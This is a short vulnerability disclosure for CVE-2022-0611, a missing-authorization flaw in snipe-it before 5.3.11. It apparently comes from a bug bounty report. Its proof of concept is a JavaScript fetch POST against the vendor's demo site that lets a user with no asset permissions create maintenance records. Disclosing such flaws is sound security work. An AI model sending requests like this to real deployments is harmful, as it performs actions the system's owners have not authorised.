Headline
CVE-2022-0611: Improper Privilege Management in snipe-it
Missing Authorization in Packagist snipe/snipe-it prior to 5.3.11.
Description
Unprivilege user can create maintainance for asset
Proof of Concept
1. Create regular user and set DENY to all permissions in asset models.
2. Login as the user and sent bellow request to create maintainance for asset
await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1"
},
"referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
"body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=¬es=by_admin",
"method": "POST",
"mode": "cors"
});
Impact
unprivileged user can create maintainance for any asset
Occurrences